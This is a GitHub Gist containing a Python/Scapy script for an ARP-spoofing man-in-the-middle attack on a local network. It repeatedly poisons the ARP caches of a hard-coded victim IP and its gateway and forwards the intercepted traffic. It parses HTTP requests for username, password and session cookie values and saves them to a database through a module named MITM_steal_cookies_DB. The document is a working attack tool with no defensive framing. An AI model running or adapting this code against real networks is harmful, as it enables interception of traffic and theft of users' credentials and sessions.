Created
June 10, 2020 20:32
-
-
Save PachUp/f59d66aaf99ee60e5f966d8fd13c5a98 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import * | |
| from time import sleep | |
| import sys | |
| from getmac import get_mac_address | |
| import MITM_steal_cookies_DB | |
| from threading import Thread | |
| from scapy.packet import * | |
| from scapy.layers.http import HTTP | |
| from sqlalchemy import * | |
| import sqlalchemy as db | |
| load_layer("http") | |
| def getmac(targetip): | |
| arppacket = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=targetip) | |
| try: | |
| targetmac = srp(arppacket, timeout=2, verbose=False)[0][0][1].hwsrc | |
| except: | |
| targetmac = "" | |
| return targetmac | |
| # tcp and tcp.seq == 0 and eth.src == 84:a6:c8:62:dd:e2 | |
| # WIFI 1 mac: 84:a6:c8:62:dd:e2 | |
| # WIFI 2 mac: 50:3e:aa:4c:18:6b | |
| MY_MAC = '84:a6:c8:62:dd:e2' # my MAC address | |
| targetip = "192.168.1.170" # change to input, the targeted ip address | |
| gatewayip = "192.168.1.1" # mine and my victim's gateway | |
| try: | |
| targetmac = getmac(targetip) | |
| print ("Target MAC", targetmac) | |
| except: | |
| print ("Target machine didn't respond to ARP broadcast") | |
| quit() | |
| try: | |
| gatewaymac = getmac(gatewayip) | |
| print ("Gateway MAC:", gatewaymac) | |
| except: | |
| print("The gateway can not be reached") | |
| quit() | |
| """ | |
| def filter_victim(my_packet): | |
| for i in my_packet[Ether]: | |
| print (i.show()) | |
| print('victim!') | |
| if Ether in my_packet and IP in my_packet: | |
| print(targetmac) | |
| print(Ether in my_packet) | |
| print(IP in my_packet) | |
| print(my_packet[Ether].dst == MY_MAC) | |
| print(my_packet[IP].dst == targetip) | |
| print(my_packet[IP].src == targetip) | |
| if my_packet[IP].dst == targetip and my_packet[Ether].dst == MY_MAC: | |
| print('ds: ' + my_packet[IP].dst) | |
| print("great!") | |
| my_packet[Ether].dst = gatewaymac | |
| print(my_packet[Ether].dst) | |
| return True | |
| else: | |
| return False | |
| def start_three_way_handshake(my_packet): | |
| if my_packet[Ether].src == gatewaymac and my_packet[Ether].dst == MY_MAC: | |
| return True | |
| else: | |
| return False | |
| def complete_three_way_handshake(my_packet): | |
| if my_packet[Ether].dst == gatewaymac and my_packet[Ether].src == MY_MAC: | |
| for i in my_packet[Ether]: | |
| print(i.show()) | |
| return True | |
| else: | |
| return False | |
| """ | |
| def get_session(my_packet): | |
| http_pack = str(my_packet.getlayer('HTTP')) | |
| # print(str(my_packet.getlayer('HTTP'))) | |
| try: | |
| copy_http = http_pack | |
| sp = copy_http.split('name=') | |
| p = sp[1] | |
| check_real = sp[0] | |
| if check_real[-1] == '?': | |
| name_pass = p.split(' ')[0] | |
| sperate = name_pass.split('&') | |
| name = sperate[0] | |
| password = sperate[1] | |
| password = password.split('pass=')[1] | |
| try: | |
| password = password.split('\\r\\nAccept-Encoding:')[0] | |
| try: | |
| cook = http_pack.split('id')[-1] | |
| cooki = cook.split('=')[1] | |
| check_real_cookie = cook.split('=')[0] | |
| if check_real_cookie[-1].isdigit(): | |
| cookie = cooki.split('\\r\\n\\r\\n')[0] | |
| print("Name: " + name + " password: " + password + " Cookie: " + cookie) | |
| MITM_steal_cookies_DB.insert_cookies_to_DB(name, password, cookie) | |
| print(n) | |
| return True | |
| except: | |
| pass | |
| except: | |
| pass | |
| except: | |
| pass | |
| return False | |
| def change_packet(pack): | |
| my_packet = pack.copy() | |
| if my_packet.haslayer('HTTP'): | |
| signed_in = get_session(my_packet) | |
| pass | |
| if Ether in my_packet and IP in my_packet: | |
| if my_packet[IP].src == targetip and my_packet[Ether].dst == MY_MAC: | |
| my_packet[Ether].src = MY_MAC | |
| my_packet[Ether].dst = gatewaymac | |
| # print(my_packet.show()) | |
| sendp(my_packet, verbose=False) | |
| send(my_packet, verbose=False) | |
| sendp(my_packet, verbose=False) | |
| send(my_packet, verbose=False) | |
| sendp(my_packet, verbose=False) | |
| send(my_packet, verbose=False) | |
| elif my_packet[Ether].src == gatewaymac and my_packet[Ether].dst == MY_MAC: | |
| my_packet[Ether].src = MY_MAC | |
| my_packet[Ether].dst = targetmac | |
| # print(my_packet.show()) | |
| sendp(my_packet, verbose=False) | |
| send(my_packet, verbose=False) | |
| sendp(my_packet, verbose=False) | |
| send(my_packet, verbose=False) | |
| sendp(my_packet, verbose=False) | |
| send(my_packet, verbose=False) | |
| def filter_connection(): | |
| sniff(prn=change_packet) | |
| def create_connection(): | |
| packet = ARP(op=1, pdst=targetip, hwdst=targetmac, psrc=gatewayip) | |
| send(packet, verbose=False) | |
| packet2 = ARP(op=1, pdst=gatewayip, hwdst=gatewaymac, psrc=targetip) | |
| send(packet2, verbose=False) | |
| packet = ARP(op=2, pdst=targetip, hwdst=targetmac, psrc=gatewayip) | |
| send(packet, verbose=False) | |
| packet2 = ARP(op=2, pdst=gatewayip, hwdst=gatewaymac, psrc=targetip) | |
| send(packet2, verbose=False) | |
| def execute_connection(): | |
| while True: | |
| create_connection() | |
| def main(): | |
| print("tricking the machines") | |
| Thread(target=execute_connection).start() | |
| Thread(target=filter_connection).start() | |
| """ | |
| recv_packet = sniff(count=1, lfilter=filter) | |
| print('recived packets!') | |
| msg = recv_packet[Raw] | |
| for i in msg: | |
| print(i.load.decode('utf-8', 'ignore')) | |
| """ | |
| if __name__ == "__main__": | |
| main() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment